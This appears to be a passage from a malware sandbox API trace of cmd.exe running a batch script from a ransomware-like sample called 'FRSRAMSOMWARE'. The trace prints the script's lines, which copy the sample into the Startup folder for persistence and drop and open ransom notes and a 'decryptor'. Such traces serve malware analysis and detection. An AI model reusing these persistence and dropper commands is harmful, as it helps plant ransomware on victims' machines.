lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0086.354] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0086.354] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.354] GetFileType (hFile=0x254) returned 0x1 [0086.354] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0086.354] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.354] SetFilePointer (in: hFile=0x254, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0086.354] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0086.354] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0086.354] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.354] GetFileType (hFile=0x254) returned 0x1 [0086.354] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0086.354] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.354] SetFilePointer (in: hFile=0x254, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0086.354] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0086.354] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0086.354] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.354] GetFileType (hFile=0x254) returned 0x1 [0086.354] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0086.354] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.354] SetFilePointer (in: hFile=0x254, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0086.354] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0086.354] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0086.354] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.354] GetFileType (hFile=0x254) returned 0x1 [0086.354] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0086.354] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.354] SetFilePointer (in: hFile=0x254, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0086.354] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0086.354] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0086.355] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.355] GetFileType (hFile=0x254) returned 0x1 [0086.355] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0086.355] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.355] SetFilePointer (in: hFile=0x254, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0086.355] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0086.355] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0086.355] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.355] GetFileType (hFile=0x254) returned 0x1 [0086.355] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0086.355] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.355] SetFilePointer (in: hFile=0x254, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0086.355] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0086.355] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0086.355] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.355] GetFileType (hFile=0x254) returned 0x1 [0086.355] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0086.355] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0086.355] SetFilePointer (in: hFile=0x254, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0086.355] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0086.355] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0086.355] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.355] GetFileType (hFile=0x254) returned 0x1 [0086.355] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0086.355] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0086.355] SetFilePointer (in: hFile=0x254, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0086.355] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0086.355] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0086.355] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.355] GetFileType (hFile=0x254) returned 0x1 [0086.355] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0086.355] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0086.356] SetFilePointer (in: hFile=0x254, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0086.356] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0086.356] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0086.356] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.356] GetFileType (hFile=0x254) returned 0x1 [0086.356] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0086.356] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0086.356] SetFilePointer (in: hFile=0x254, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0086.356] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0086.356] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0086.356] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.356] GetFileType (hFile=0x254) returned 0x1 [0086.356] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0086.356] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0086.356] SetFilePointer (in: hFile=0x254, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0086.356] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0086.356] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0086.356] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.356] GetFileType (hFile=0x254) returned 0x1 [0086.356] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0086.356] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0086.356] SetFilePointer (in: hFile=0x254, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0086.356] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0086.356] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0086.356] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.356] GetFileType (hFile=0x254) returned 0x1 [0086.356] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0086.356] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0086.357] SetFilePointer (in: hFile=0x254, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0086.357] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0086.357] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0086.357] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.357] GetFileType (hFile=0x254) returned 0x1 [0086.357] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0086.357] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0086.357] SetFilePointer (in: hFile=0x254, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0086.357] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0086.357] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0086.357] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.357] GetFileType (hFile=0x254) returned 0x1 [0086.357] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0086.357] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0086.357] SetFilePointer (in: hFile=0x254, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0086.357] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0086.357] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0086.357] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.357] GetFileType (hFile=0x254) returned 0x1 [0086.357] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0086.357] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0086.357] SetFilePointer (in: hFile=0x254, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0086.357] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0086.357] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0086.357] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.357] GetFileType (hFile=0x254) returned 0x1 [0086.357] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0086.357] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0086.357] SetFilePointer (in: hFile=0x254, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0086.357] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0086.358] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0086.358] _get_osfhandle (_FileHandle=1) returned 0x28 [0086.358] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0086.358] _get_osfhandle (_FileHandle=0) returned 0x24 [0086.358] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0086.358] SetConsoleInputExeNameW () returned 0x1 [0086.358] GetConsoleOutputCP () returned 0x1b5 [0086.358] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0086.358] SetThreadUILanguage (LangId=0x0) returned 0x409 [0086.359] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x254 [0086.359] _open_osfhandle (_OSFileHandle=0x254, _Flags=8) returned 3 [0086.359] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.359] SetFilePointer (in: hFile=0x254, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0086.359] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0086.359] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0086.359] SetFilePointer (in: hFile=0x254, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0086.359] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0086.359] GetFileType (hFile=0x254) returned 0x1 [0086.359] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.359] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0086.359] _tell (_FileHandle=3) returned 2512 [0086.359] _close (_FileHandle=3) returned 0 [0086.359] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0086.359] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0086.359] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0086.359] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0086.359] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0086.359] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0086.359] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0086.359] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0086.359] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0086.359] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0086.359] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0086.359] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0086.359] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0086.359] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0086.359] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0086.359] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0086.359] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0086.359] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0086.359] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0086.359] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0086.359] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0086.359] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0086.360] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0086.360] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0086.360] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0086.360] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0086.360] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0086.360] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0086.360] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0086.360] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0086.360] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0086.360] _wcsicmp (_String1="ping", _String2="START") returned -3 [0086.360] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0086.360] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0086.360] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0086.360] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0086.360] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0086.360] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0086.360] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0086.360] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0086.360] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0086.360] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0086.360] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0086.360] SetErrorMode (uMode=0x0) returned 0x0 [0086.360] SetErrorMode (uMode=0x1) returned 0x0 [0086.360] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0086.360] SetErrorMode (uMode=0x0) returned 0x1 [0086.360] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0086.360] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0086.360] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0086.360] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0086.360] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0086.360] GetLastError () returned 0x2 [0086.360] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0086.360] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59d70 [0086.360] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 